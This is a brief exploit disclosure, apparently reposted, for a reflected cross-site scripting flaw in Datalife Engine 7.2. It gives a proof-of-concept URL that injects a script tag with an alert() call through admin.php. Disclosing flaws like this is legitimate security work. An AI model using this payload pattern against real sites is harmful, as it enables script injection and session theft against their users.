DLE7.2 版Xss跨站漏洞被发现(Exploit)

Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
CMS: Datalife Engine ( version 7.2 )
-------------------------------------------

XSS

Exploit :

query :

http://[www.example.com]/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiam
arsi')%3C/ScRiPt%3E

参与评论

游客评论不支持回复他人评论内容,如需回复他人评论内容请